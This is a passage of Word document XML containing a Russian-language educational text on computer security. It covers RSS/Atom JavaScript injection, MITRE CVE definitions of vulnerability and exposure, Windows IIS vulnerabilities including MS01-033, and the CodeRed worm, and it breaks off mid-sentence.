          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RSS </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Atom injection - </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">внедрение </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в страницы, исполняемые Интернет браузером</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Основной проблемой является возможность активного содержимого веб страниц </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Java Script, Visual Basic Script) </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>выполнять небезопасные действия на компьютере пользователя, имея беспрепятственный доступ к Интернет и возможность управлять браузером для вывода пользователю ложной информации.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Кроме того, больше половины вредоносных веб сайтов используют различные методы скрытия вредоносной активности (обфускация кода).</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r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программные уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="1326"/>
          <w:tab w:val="center" w:pos="1546"/>
          <w:tab w:val="center" w:pos="2305"/>
          <w:tab w:val="right" w:pos="3961"/>
        </w:tabs>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Термин «уязвимость» часто упоминается в связи с компьютерной безопасностью, во множестве самых различных контекстов. В общем случае, уязвимость </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>ассоциируется с нарушением политики безопасности, вызванным неправильно заданным набором правил или ошибкой в обеспечивающей безопасность компьютера программе. Стоит отметить, что теоретически все компьютерные системы имеют уязвимости. Но то, насколько велик потенциальный ущерб от вирусной атаки, использующей уязвимость, позволяет подразделять уязвимости на активно используемые и не используемые вовсе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="1892"/>
          <w:tab w:val="center" w:pos="2698"/>
        </w:tabs>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Предпринималось много попыток четко определить термин «уязвимость» и разделить два его значения. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исследовательская группа, финансируемая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> федеральным правительством США, занимающаяся анализом и разрешен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ем критических проблем с безопасностью, разработала следующие определ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния:</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Согласно терминологии </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>MITRE CVE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Уязвимость </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>— это состояние вычислительной системы (или нескольких систем), которое позволяет:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1426"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исполнять команды от имени другого пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1426"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>получать доступ к информации, закрытой от доступа для данного пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1426"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>показывать себя как иного пользователя или ресурс;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1426"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>производить атаку типа «отказ в обслуживании».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В </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">считают, что атака, производимая вследствие слабой или неверно настроенной политики безопасности, лучше описывается термином «открытость» </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(exposure).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открытость </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>— это состояние вычислительной системы (или нескольких систем), которое не является уязвимостью, но:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>позволяет атакующему производить сбор защищенной информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1426"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>позволяет атакующему скрывать свою деятельность;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>содержит возможности, которые работают корректно, но могут быть легко использованы в неблаговидных целях;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="710"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="809" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>является первичной точкой входа в систему, которую атакующий может использовать для получения доступа или информации.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Когда хакер пытается получить неавторизованный доступ к системе, он производит сбор информации (расследование) о своем объекте, собирает любые доступные данные и затем использует слабость политики безопасности («открытость») или какую-либо уязвимость. Существующие уязвимости и открыт</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сти являются точками, требующими особенно внимательной проверки при н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стройке системы безопасности против неавторизованного вторжения.</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Наиболее распространенная в настоящее время на подключенных к интернету компьютерах операционная система </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">содержит множественные опасные уязвимости. Чаще всего хакерами используются уязвимости в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS, MS SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet Explorer, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а также системах обработки файлов и се</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>висах сообщений самой операционной системы.</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Уязвимость в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">подробно описанная в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Security Bulletin MS01-033, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">является одной из наиболее часто используемых уязвимостей </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В последние годы было написано множество сетевых червей, пользующихся данной уязвимостью, но одним из наиболее известных является </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeRed. CodeRed </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">был впервые обнаружен 17 июля 2001 года, и, по некоторым оценкам, заразил около 300 тысяч компьютеров, помешал работе множества предприятий и нанес значительный финансовый ущерб компаниям по всему миру. Хотя </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и выпустила вместе с бюллетенем </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MS01-033 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">патч, закрывающий используемую червем уязвимость, некоторые версии </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
